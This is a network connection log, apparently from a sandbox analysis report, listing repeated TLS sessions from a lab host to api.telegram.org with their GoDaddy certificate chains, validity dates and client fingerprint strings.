                                                                                          May 27, 2021 21:34:44.536331892 CEST149.154.167.220443192.168.2.2249171CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
                                                                                          CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                          CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                          OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                          May 27, 2021 21:34:47.077511072 CEST149.154.167.220443192.168.2.2249172CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
                                                                                          CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                          CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                          OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                          May 27, 2021 21:34:54.130405903 CEST149.154.167.220443192.168.2.2249173CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
                                                                                          CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                          CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                          OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                          May 27, 2021 21:34:57.470839024 CEST149.154.167.220443192.168.2.2249174CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
                                                                                          CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                          CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                          OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                          May 27, 2021 21:35:00.090785980 CEST149.154.167.220443192.168.2.2249175CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
                                                                                          CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                          CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                          OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                          May 27, 2021 21:35:06.372769117 CEST149.154.167.220443192.168.2.2249177CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
                                                                                          CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                          CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                          OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                          May 27, 2021 21:35:12.175335884 CEST149.154.167.220443192.168.2.2249178CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
                                                                                          CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                          CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                          OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                          May 27, 2021 21:35:14.229561090 CEST149.154.167.220443192.168.2.2249179CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
                                                                                          CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                          CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                          OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                          May 27, 2021 21:35:18.251988888 CEST149.154.167.220443192.168.2.2249180CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
                                                                                          CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                          CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                          OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                          May 27, 2021 21:35:19.170706987 CEST149.154.167.220443192.168.2.2249181CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
                                                                                          CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                          CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                          OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                          May 27, 2021 21:35:19.935199022 CEST149.154.167.220443192.168.2.2249182CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
                                                                                          CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                          CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                          OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                          May 27, 2021 21:35:20.222497940 CEST149.154.167.220443192.168.2.2249183CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
                                                                                          CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                          CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                          OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                          May 27, 2021 21:35:20.702159882 CEST149.154.167.220443192.168.2.2249184CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
